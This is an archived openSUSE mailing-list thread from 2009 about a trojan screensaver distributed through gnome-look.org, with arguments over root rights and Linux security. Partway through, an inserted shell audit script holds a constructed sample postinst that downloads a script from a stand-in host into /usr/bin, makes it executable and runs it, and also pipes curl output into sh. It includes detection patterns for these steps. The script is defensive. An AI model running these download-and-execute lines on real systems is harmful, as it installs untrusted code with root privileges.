[opensuse] Carelessness busts Linux security
I originally posted this in offtopic but think that this would be of interest to more people than just those frequenting offtopic. *No operating system can ever properly protect a computer from trojans as long as users continue to do silly things. Just because Linux is immune to your standard drive-by viruses it does not mean that it can escape trojan horses.* The latest reminder to be vigilant comes via the users unfortunate enough <http://ubuntuforums.org/showthread.php?t=1349678> to download and install a malicious screensaver from gnome-look.org <http://www.gnome-look.org/content/show.php/WaterFall+Screensaver?content=116772>. Although the malicious content is now removed, the code fragments left show what the trojan's potential may have been. The program inserted a bash script into |/usr/bin/| by using |wget| and then executing the script. Originally the script's contents were a ping command but this was later changed to: .................. http://www.zdnet.com.au/blogs/null-pointer/soa/Carelessness-busts-Linux-secu... BC -- The best defence against logic is ignorance. -- To unsubscribe, e-mail: opensuse+unsubscribe@opensuse.org For additional commands, e-mail: opensuse+help@opensuse.org
On Thu, 2009-12-10 at 12:29 +1100, Basil Chupin wrote:
I originally posted this in offtopic but think that this would be of interest to more people than just those frequenting offtopic. *No operating system can ever properly protect a computer from trojans as long as users continue to do silly things. Just because Linux is immune to your standard drive-by viruses it does not mean that it can escape trojan horses.* The latest reminder to be vigilant comes via the users unfortunate enough <http://ubuntuforums.org/showthread.php?t=1349678> to download and install a malicious screensaver from gnome-look.org <http://www.gnome-look.org/content/show.php/WaterFall+Screensaver?content=116772>. Although the malicious content is now removed, the code fragments left show what the trojan's potential may have been. The program inserted a bash script into |/usr/bin/| by using |wget| and then executing the script. Originally the script's contents were a ping command but this was later changed to:
Nope, only superuser can create a file in /usr/bin; so this has no impact on "careless users", only careless admins.
On Thu, 10 Dec 2009 12:29:59 +1100, you wrote:
The program inserted a bash script into |/usr/bin/| by using |wget| and then executing the script.
This can only happen to a user that has superuser (i.e. 'root') rights. Normal users can't write in /usr/bin. openSUSE warns you prominently when you start an X session as root. If you ignore that, you have nobody to blame than yourself. Philipp
On 12/10/2009 05:39 AM, Philipp Thomas wrote:
This can only happen to a user that has superuser (i.e. 'root') rights. Normal users can't write in /usr/bin. openSUSE warns you prominently when you start an X session as root. If you ignore that, you have nobody to blame than yourself.
It /did/ warn. It doesn't warn. I tried. -- Cheers / Saludos, Carlos E. R. (from 11.2 "Emerald" GM (bombadillo))
On Thursday 10 Dec 2009 01:29:59 Basil Chupin wrote:
I originally posted this in offtopic but think that this would be of interest to more people than just those frequenting offtopic.
*No operating system can ever properly protect a computer from trojans as long as users continue to do silly things. Just because Linux is immune to your standard drive-by viruses it does not mean that it can escape trojan horses.*
The latest reminder to be vigilant comes via the users unfortunate enough <http://ubuntuforums.org/showthread.php?t=1349678> to download and install a malicious screensaver from gnome-look.org <http://www.gnome-look.org/content/show.php/WaterFall+Screensaver?content=116772>.
Although the malicious content is now removed, the code fragments left show what the trojan's potential may have been.
The program inserted a bash script into |/usr/bin/| by using |wget| and then executing the script. Originally the script's contents were a ping command but this was later changed to:
..................
http://www.zdnet.com.au/blogs/null-pointer/soa/Carelessness-busts-Linux-security/0,2001102868,339299939,00.htm?feed=rss
BC
Let's hope there is someone on the KDE related download sites checking for people trying to insert malware into their programs.
On 10/12/09 18:12, ianseeks wrote:
On Thursday 10 Dec 2009 01:29:59 Basil Chupin wrote:
I originally posted this in offtopic but think that this would be of interest to more people than just those frequenting offtopic.
*No operating system can ever properly protect a computer from trojans as long as users continue to do silly things. Just because Linux is immune to your standard drive-by viruses it does not mean that it can escape trojan horses.*
The latest reminder to be vigilant comes via the users unfortunate enough <http://ubuntuforums.org/showthread.php?t=1349678> to download and install a malicious screensaver from gnome-look.org <http://www.gnome-look.org/content/show.php/WaterFall+Screensaver?content=116772>.
Although the malicious content is now removed, the code fragments left show what the trojan's potential may have been.
The program inserted a bash script into |/usr/bin/| by using |wget| and then executing the script. Originally the script's contents were a ping command but this was later changed to:
..................
http://www.zdnet.com.au/blogs/null-pointer/soa/Carelessness-busts-Linux-security/0,2001102868,339299939,00.htm?feed=rss
BC
Let's hope there is someone on the KDE related download sites checking for people trying to insert malware into their programs.
It is rather disappointing that nobody from Novell/openSUSE has bothered to respond to this because I raised (again), indirectly, this question about the security of Linux in my repost (see, REPOST: Most interesting.... etc) a couple of days ago in this forum. As my REPOST message states, the question of security was not fully pursued - after it was claimed that permissions can be changed even within a user's environment. The question raised in the kubuntu forum also did not attract a response from those offering kubuntu to its audience. The security question there also remains unanswered - the same as here I have to say. I can understand why security issues, what they are and how they could be compromised, should not be publicly discussed but I cannot see why questions about security have to only be answered by ordinary users in this, or other similar fora, without somebody from the producers of the OS - in this case, openSUSE - cannot state what the "official" response is about how 'their' OS is not subject to being compromised. I think that you can get the gist of what I am talking about....(Which is something along-the-lines of getting a response from somebody who has a genuine and recognisable monicker directly linking her/him to Novell's ownership of openSUSE.) It really is like the argument going on at the present time between those who claim that there is global warming and those who claim that there is no such thing. While the former keep quoting scientific papers which have been peer-reviewed, the latter can only quote blogs, lobbyists' ravings and newspaper articles. BC -- If you don't succeed you run the risk of failure.
I can understand why security issues, what they are and how they could be compromised, should not be publicly discussed but I cannot see why questions about security have to only be answered by ordinary users in this, or other similar fora, without somebody from the producers of the OS - in this case, openSUSE - cannot state what the "official" response is about how 'their' OS is not subject to being compromised.
It is *not* 'their' OS, it is Open Source. And this issue does *not* represent a compromise; it represents stupidity and negligence on the part of the local administrator.
I think that you can get the gist of what I am talking about....(Which is something along-the-lines of getting a response from somebody who has a genuine and recognisable monicker directly linking her/him to Novell's ownership of openSUSE.)
I have *no* need of anyone from Novell to respond about this - the answer is that basic UNIX security resolves this issue; and all distributions are impacted the exact same way.
It really is like the argument going on the present time between those who claim that there is global warming and those who claim that there is no such thing.
Go stuff it.
On 11/12/09 22:18, Adam Tauno Williams wrote:
I can understand why security issues, what they are and how they could be compromised, should not be publicly discussed but I cannot see why questions about security have to only be answered by ordinary users in this, or other similar fora, without somebody from the producers of the OS - in this case, openSUSE - cannot state what the "official" response is about how 'their' OS is not subject to being compromised.
It is *not* 'their' OS, it is Open Source.
In case you haven't heard, just in case in case, Novell/openSUSE people "massage" things to make some things 'unique' to oS. For example, is YaST available in other distros? And have you read some of the dox in oS which specifically state that openSUSE has "massaged" control files (but don't ask me right now for an example.) And have you heard that there is a movement to standardise the way distros are put together so that all/most control files/directory structures/apps can be interchangeable? Yes/No?
And this issue does *not* represent a compromise; it represents stupidity and negligence on the part of the local administrator.
See my response to Marcus. Who is oS aimed at: the "administrator" or the common punter, like me, in the street?
I think that you can get the gist of what I am talking about....(Which is something along-the-lines of getting a response from somebody who has a genuine and recognisable monicker directly linking her/him to Novell's ownership of openSUSE.)
I have *no* need
You selfish bugger! Always with the, "Me, me, me......" Well, *I* do have a need for such a response! Got a problem with this?
of anyone from Novell to respond about this - the answer is that basic UNIX security resolves this issue; and all distributions are impacted the exact same way.
So? So why cannot someone - someone like you for example - answer this question? All you keep going on about is what you have been going on about. Why not at least have the capacity to answer like Marcus is answering with sensible responses based on knowledge.
It really is like the argument going on the present time between those who claim that there is global warming and those who claim that there is no such thing.
Go stuff it.
Where? BC -- If you don't succeed you run the risk of failure.
On Sun, 2009-12-13 at 15:16 +1100, Basil Chupin wrote:
On 11/12/09 22:18, Adam Tauno Williams wrote:
I can understand why security issues, what they are and how they could be compromised, should not be publicly discussed but I cannot see why questions about security have to only be answered by ordinary users in this, or other similar fora, without somebody from the producers of the OS - in this case, openSUSE - cannot state what the "official" response is about how 'their' OS is not subject to being compromised. It is *not* 'their' OS, it is Open Source. In case you haven't heard, just in case in case, Novell/openSUSE people "massage" things to make some things 'unique' to oS. For example, is YaST available in other distros?
HELLO - That is what distributions do! Is system-config-securitylevel-tui available on openSUSE? No, but it exists on every CentOS box. And, BTW, YaST is an Open Source project used on distributions other than SUSE - including Oracle's "unbreakable" distribution.
And have you read some of the dox in oS which specifically state that openSUSE has "massaged" control files (but don't ask me right now for an example.)
Duh. It is a distro.
And have you heard that there is a movement to standardise the way distros are put together so that all/most control files/directory structures/apps can be interchangeable? Yes/No?
Yes. I package software. I'm aware. openSUSE complies very well with the Linux filesystem standard. Go read the document and come back with cases where it doesn't.
On Sun, 13 Dec 2009 12:51:05 -0500, you wrote:
openSUSE complies very well with the Linux filesystem standard.
He's talking about LSB, not FHS. But again openSUSE was one of the first if not the first distribution to comply with LSB. Philipp
On Sun, 13 Dec 2009 15:16:55 +1100, you wrote:
In case you haven't heard, just in case in case, Novell/openSUSE people "massage" things to make some things 'unique' to oS.
No, they're not!
For example, is YasT available in other distros?
That's not our fault! YaST is completely open source and other distributions are free to use it. BTW, there is *no* standard install and configuration tool for Linux distributions.
And have you read some of the dox in oS which specifically state that openSUSE has "massaged" control files (but don't ask me right now for an example.)
Without proof I'll call this FUD.
And have you heard that there is a movement to standardise the way distros are put together so that all/most control files/directory structures/apps can be interchangeable? Yes/No?
That movement is called LSB and SUSE Linux was AFAIK the first distribution to comply with it. But you seem to lack the knowledge of what LSB defines. I suggest reading up on it before talking about it.
Who is oS aimed at: the "administrator" or the common punter, like me, in the street?
In a Linux system, the common punter *has* to acquire some admin knowledge otherwise it's hopeless. Linux makes it harder to shoot your foot but not impossible. Philipp
On 14/12/09 08:10, Philipp Thomas wrote:
In a Linux system, the common punter *has* to acquire some admin knowledge otherwise it's hopeless. Linux makes it harder to shoot your foot but not impossible.
So, the most common concept/impression about Linux that it is "for geeks" is correct, according to your understanding. Correct? Unless you first acquire some "admin knowledge" you should not install a Linux distro - least of all openSUSE - but stick with whatever flavour of Microsoft Windows you are currently using. Is this correct, according to your words? Alright then....let's go on.... "Linux makes it harder to shoot your foot but not impossible." I've been asking - if you really bothered to understand what I have been writing - is, "What is being done to stop this possibility of shooting oneself in the foot" when all the normal blurb, brouhaha, BS, about Linux being so secure that one should move from MS to Linux if you want security? OK, fine, Linux is more secure than MS or Apple s/ware - but it is NOT as watertight as a fish's bum, right? So why not simply acknowledge that Linux is not as tight as a fish's bum - and then go about trying to ensure that it IS watertight. I asked if AppArmor was the fledgling beginning of such an aim. Are you in agreement or are you not? BC -- If you don't succeed you run the risk of failure.
On Mon, 14 Dec 2009 16:57:44 +1100, you wrote:
Unless you first acquire some "admin knowledge" you should not install a Linux distro - least of all openSUSE - but stick with whatever flavour of Microsoft Windows you are currently using. Is this correct, according to your words?
No, you're putting words into my mouth I never said! Since when has failure of knowledge stopped anyone from installing Windows?
if you really bothered to understand what I have been writing
Thank you, but I have indeed understood what you've been writing. Don't imply misunderstanding when people don't say what you expect.
"What is being done to stop this possibility of shooting oneself in the foot"
You have to allow for that possibility as you would otherwise create a system nobody can work with and wants to work with.
when all the normal blurb, brouhaha, BS, about Linux being so secure that one should move from MS to Linux if you want security?
Linux *is* much more secure than Windows, period! Given that an application can't normally write anywhere outside your home directory there is for instance no way to infect binaries outside your home directory. There is *no* way to control what an admin installs so if you trust unknown sources you're the only one to blame. This is a social problem that you can't solve with technical means or at least only to a certain degree.
but it is NOT as watertight as a fish's bum, right?
Nobody said that it is so.
and then go about trying to ensure that it IS watertight.
You can't make it watertight. You're dealing with living persons and as long as you let them have access to a system there's always possibilities for security breaches.
I asked if AppArmor was the fledgling beginning of such an aim.
AA is more than a fledgling beginning. If you want to see where stricter security leads look at the huge effort needed to get SELinux working the way you want it. And no, this is nothing a distributor can do for you. Philipp
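The mechanism described at the top of the thread (an install step that fetches a script with wget, drops it into /usr/bin and executes it) and Philipp's point above that nothing stops an admin from installing whatever they choose to trust come down to the same practical check: read a package's install-time scripts before running them as root. What follows is an added example, not code from the thread, from openSUSE or from the gnome-look package. It is a small POSIX shell audit that flags that pattern in maintainer scripts; the two sample scripts, the example.invalid URL and the function names are constructed for illustration. For a real package you would feed it the scriptlets you get from `rpm -qp --scripts pkg.rpm` or the control files from `dpkg-deb -e pkg.deb ctrl` instead of the constructed samples.

```shell
#!/bin/sh
# Added example (not from the thread or from any distribution): heuristic audit
# of package install-time scripts for the pattern the thread describes, namely
# fetch something over the network, drop it into a system binary directory,
# make it executable and run it. The sample scripts below are constructed for
# illustration and are not the real gnome-look screensaver code.

SAMPLE_DIR=$(mktemp -d)
trap 'rm -rf "$SAMPLE_DIR"' EXIT

# Constructed sample 1: a postinst shaped like the trojan the thread describes.
BAD="$SAMPLE_DIR/postinst.trojan"
cat > "$BAD" <<'EOF'
#!/bin/sh
set -e
wget -q http://example.invalid/run.bash -O /usr/bin/run.bash
chmod 755 /usr/bin/run.bash
/usr/bin/run.bash
curl -s http://example.invalid/extra.sh | sh
EOF

# Constructed sample 2: a typical benign postinst for a theme or screensaver.
GOOD="$SAMPLE_DIR/postinst.benign"
cat > "$GOOD" <<'EOF'
#!/bin/sh
set -e
if command -v gtk-update-icon-cache >/dev/null 2>&1; then
    gtk-update-icon-cache -q /usr/share/icons/hicolor || true
fi
EOF

# Print one line per suspicious construct found in the script at $1.
# These are heuristics: a miss is not proof the script is clean.
audit_install_script() {
    script="$1"
    # 1. Any network fetch at install time: a package should ship its payload.
    if grep -Eq '(^|[^[:alnum:]_])(wget|curl)([^[:alnum:]_]|$)' "$script"; then
        echo "$script: downloads content at install time (wget/curl)"
    fi
    # 2. Writing into /bin, /sbin, /usr/bin, /usr/sbin or /usr/local/bin
    #    via a redirect, wget/curl output flag, cp, mv or install.
    if grep -Eq '(-O|-o|>>?|cp|mv|install)[[:space:]]+/(usr/(local/)?)?s?bin/' "$script"; then
        echo "$script: writes a file into a system binary directory"
    fi
    # 3. Making something under those directories executable.
    if grep -Eq 'chmod[[:space:]]+[^[:space:]]*[x7][^[:space:]]*[[:space:]]+/(usr/(local/)?)?s?bin/' "$script"; then
        echo "$script: makes a file under a system binary directory executable"
    fi
    # 4. Downloaded content piped straight into a shell.
    if grep -Eq '(wget|curl)[^|]*[|][[:space:]]*(ba|da|k|z)?sh([[:space:]]|$)' "$script"; then
        echo "$script: pipes downloaded content straight into a shell"
    fi
    return 0
}

# Number of findings for the script at $1 (0 means nothing was flagged).
count_findings() {
    audit_install_script "$1" | wc -l | tr -d ' '
}

# Audit every script given as an argument; returns 1 if any was flagged,
# so it can gate an installation step.
audit_all() {
    status=0
    for s in "$@"; do
        n=$(count_findings "$s")
        if [ "$n" -gt 0 ]; then
            echo "== $s: $n suspicious construct(s); do not install as root without reading it"
            audit_install_script "$s"
            status=1
        else
            echo "== $s: nothing flagged by these heuristics (not proof that it is clean)"
        fi
    done
    return "$status"
}

# With no arguments, run over the constructed samples; otherwise over the
# scripts named on the command line. DEMO_STATUS holds the gate result.
DEMO_STATUS=0
if [ "$#" -eq 0 ]; then
    audit_all "$BAD" "$GOOD" || DEMO_STATUS=$?
else
    audit_all "$@" || DEMO_STATUS=$?
fi
```

Run it with no arguments to see the constructed trojan-style postinst flagged four times and the benign one pass; pass real extracted scriptlets as arguments to audit a package you are about to install. Since the whole point of the thread is that these scripts run as root, the time to read them is before, not after, typing the root password.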
On Friday, 2009-12-11 at 17:56 +1100, Basil Chupin wrote:
It is rather disappointing that nobody from Novell/openSUSE has bothered to respond to this because I raised (again), indirectly, this question about the security of Linux in my repost (see, REPOST: Most interesting.... etc) a couple of days ago in this forum.
There is a security list, if you really think this is a security issue. However, there is nothing in the world that can protect you from a trojan you install yourself. -- Cheers, Carlos E. R.
On 12/12/09 21:18, Carlos E. R. wrote:
On Friday, 2009-12-11 at 17:56 +1100, Basil Chupin wrote:
It is rather disappointing that nobody from Novell/openSUSE has bothered to respond to this because I raised (again), indirectly, this question about the security of Linux in my repost (see, REPOST: Most interesting.... etc) a couple of days ago in this forum.
There is a security list, if you really think this is a security issue. However, there is nothing in the world that can protect you from a trojan you install yourself.
Thanks Carlos. I know about the security mail list. But this is not what I am talking about. I see no reason why I, or any, openSUSE user have to subscribe to a - any - security mail list to begin with. Also, the statement that "nothing in the world ..... can protect you from a trojan you install yourself" is just a bit of a rhetorical statement considering that when you - as a home user - run something like openSUSE *EVERY* file/application you install HAS to be installed by "YOU" as superuser. Try calling up YaST. You won't get in unless you type in the root password. So, this statement is just a furphy :-) . But if you are also implying that I should be pursuing this in the security mail list then my response is that why shouldn't it be discussed in a broad issue mail list such as this but instead be hidden within the bowels of a very specialised, and boring for almost everyone, mail list such as security? :-) BC -- If you don't succeed you run the risk of failure.
On Sunday, 2009-12-13 at 15:34 +1100, Basil Chupin wrote:
On 12/12/09 21:18, Carlos E. R. wrote:
There is a security list, if you really think this is a security issue. However, there is nothing in the world that can protect you from a trojan you install yourself.
Thanks Carlos. I know about the security mail list.
But this is not what I am talking about. I see no reason why I, or any, openSUSE user have to subscribe to a - any - security mail list to begin with.
Also, the statement that "nothing in the world ..... can protect you from a trojan you install yourself" is just a bit of a rhetorical statement considering that when you - as a home user - run something like openSUSE *EVERY* file/application you install HAS to be installed by "YOU" as superuser. Try calling up YaST. You won't get in unless you type in the root password.
So, this statement is just a furphy :-) .
It is a fact. Nothing can protect you (fully, that is) from a trojan. It is impossible. Same as in real life... I don't know the English names of the scams you can be subject to. Some of them are age old, and still people fall for them. Like "tocomocho" in Spanish.
But if you are also implying that I should be pursuing this in the security mail list then my response is that why shouldn't it be discussed in a broad issue mail list such as this but instead be hidden within the bowels of a very specialised, and boring for almost everyone, mail list such as security? :-)
Because the people most experienced in security are there. If they are busy experts, they will not read this. Truly, not even writing there guarantees that they'll answer this :-p You can discuss it here, of course. But then don't complain you do not get "official" answers. Nor that I assure you that you will get them there. Maybe you won't. Maybe experts consider this a futile discussion and ignore this thread completely >:-) -- Cheers, Carlos E. R.
On 14/12/09 01:17, Carlos E. R. wrote:
On Sunday, 2009-12-13 at 15:34 +1100, Basil Chupin wrote:
But if you are also implying that I should be pursuing this in the security mail list then my response is that why shouldn't it be discussed in a broad issue mail list such as this but instead be hidden within the bowels of a very specialised, and boring for almost everyone, mail list such as security? :-)
Because the people most experienced in security are there. If they are busy experts, they will not read this. Truly, not even writing there guarantees that they'll answer this :-p
You can discuss it here, of course. But then don't complain you do not get "official" answers.
Nor that I assure you that you will get them there. Maybe you won't. Maybe experts consider this a futile discussion and ignore this thread completely >:-)
Ah, of course, the "experts"....the "experts". Such wonderful peoples! So knowledgeabubblebubble! I don't have enough 'ammunition' left to keep weeing against the "experts", sorry, "the wind" so I shall now go away and recharge my reserves.... :-) . BC -- If you don't succeed you run the risk of failure.
I changed the subject to a more appropriate one. Social engineering has nothing to do with a particular operating system. On Wikipedia, in the article about computer security, you can find examples where the best software and security design was busted because of user(s). http://en.wikipedia.org/wiki/Computer_security On Friday 11 December 2009 00:56:14 Basil Chupin wrote:
As my REPOST message states, the question of security was not fully pursued - after it was claimed that permissions can be changed even within a user's environment.
It is not "even can be", it is designed to be possible. It is a UNIX heritage, where a few thousand users didn't call the system administrator to set permissions in their home directory. They did that according to their needs. And there is nothing to pursue if a user can't get basic advice: *Do* *not* *download* *files* *from* *unknown* *sources*. A web page where the majority of posts come from benevolent Linux contributors, but which has no strict control over user identity, is not automatically a place where you can trust every file posted. -- Regards Rajko, openSUSE Wiki Team: http://en.opensuse.org/Wiki_Team People of openSUSE: http://en.opensuse.org/People_of_openSUSE/About
participants (6): Adam Tauno Williams, Basil Chupin, Carlos E. R., ianseeks, Philipp Thomas, Rajko M.